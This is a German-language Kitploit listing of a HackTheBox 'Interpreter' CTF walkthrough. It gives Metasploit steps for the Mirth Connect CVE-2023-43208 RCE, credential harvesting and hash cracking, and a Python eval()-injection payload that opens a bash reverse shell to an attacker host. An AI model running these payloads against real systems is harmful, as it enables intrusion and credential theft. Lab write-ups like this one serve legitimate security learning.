Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Interpreter-HackTheBox — HackTheBox Interpreter Walkthrough: CVE-2023-43208 Mirth Connect Deserialisierungs-RCE, PBKDF2-Hash-Cracking und eval()-Injection-Privilegieneskalation zu root. | Kitploit
Tools/GitHubGitHub/ledksv/interpreter-hackthebox
Passwort-CrackingPrivilege EscalationAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubledksv/interpreter-hackthebox

Interpreter-HackTheBox

vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

HackTheBox Interpreter Walkthrough: CVE-2023-43208 Mirth Connect Deserialisierungs-RCE, PBKDF2-Hash-Cracking und eval()-Injection-Privilegieneskalation zu root.

Repository anzeigen

Interpreter — HackTheBox

Plattform: HackTheBox OS: Linux Status: Retired — vollständiger Walkthrough veröffentlicht.

Vollständiger Walkthrough: l3dsec.com/walkthroughs/interpreter-htb


Angriffskette

root@kitploit:~
Nmap → Mirth Connect 4.4.0 (80/443)
  → CVE-2023-43208 unauthentifizierte Java-Deserialisierungs-RCE
    → Shell als mirth
      → mirth.properties → MySQL-Zugangsdaten
        → MySQL → sedric PBKDF2-Hash → hashcat → SSH → USER FLAG
          → notif.py läuft als root auf 127.0.0.1:54321
            → eval()-Injection über XML POST → ROOT SHELL → ROOT FLAG

1. Enumeration

root@kitploit:~
nmap -sV -sC <TARGET_IP> -Pn
root@kitploit:~
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 9.2p1 (Debian)
80/tcp  open  http    Jetty (Mirth Connect)
443/tcp open  ssl     Jetty SSL (Mirth Connect)

Versions-Fingerprint über Mirths REST-API:

root@kitploit:~
curl -sk https://<TARGET_IP>/api/server/version -H "X-Requested-With: XMLHttpRequest"
# Returns: 4.4.0

2. Erster Zugang — CVE-2023-43208

Mirth Connect 4.4.0 ist anfällig für unauthentifizierte RCE über Java-Deserialisierung:

root@kitploit:~
use exploit/multi/http/mirth_connect_cve_2023_43208
set RHOSTS <TARGET_IP>
set RPORT 443
set LHOST <ATTACKER_IP>
set FETCH_WRITABLE_DIR /tmp
set payload cmd/unix/reverse_bash
exploit

Shell als mirth.


3. Zugangsdaten sammeln

root@kitploit:~
find / -name "mirth.properties" 2>/dev/null
# /usr/local/mirthconnect/conf/mirth.properties
# database.username = mirthdb
# database.password = <redacted>
# database.url = jdbc:mariadb://localhost:3306/mc_bdd_prod

mysql -u mirthdb -p'<db_password>' mc_bdd_prod

Die MySQL-Enumeration offenbart den Benutzer sedric mit einem PBKDF2-Hash sowie einen HL7-Kanal, der XML an http://127.0.0.1:54321/addPatient weiterleitet.


4. User Flag — Hash knacken

root@kitploit:~
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

Hash geknackt. Per SSH als sedric einloggen, /home/sedric/user.txt lesen.


5. Privilegieneskalation — eval()-Injection

notif.py läuft als root und lauscht auf 127.0.0.1:54321/addPatient — demselben Endpunkt, an den Mirth XML weiterleitet. Es übergibt das XML-Feld firstname direkt an Pythons eval().

Payload aus der mirth-Shell:

root@kitploit:~
import urllib.request, base64
from urllib.request import Request

cmd = "bash -i >& /dev/tcp/<ATTACKER_IP>/9004 0>&1"
b64 = base64.b64encode(cmd.encode()).decode()
inj = f"{{exec(__import__('base64').b64decode('{b64}').decode())}}"
xml = f"<patient><firstname>{inj}</firstname><lastname>x</lastname></patient>"

req = Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml.encode(),
    headers={"Content-Type": "application/xml"}
)
urllib.request.urlopen(req)

Root-Shell auf dem Listener empfangen.


Flags

FlagWert
Userredacted
Rootredacted

Nur zu Bildungszwecken. Teste ausschließlich Systeme, die dir gehören oder für die du eine ausdrückliche schriftliche Genehmigung zum Testen hast.

Tool herunterladen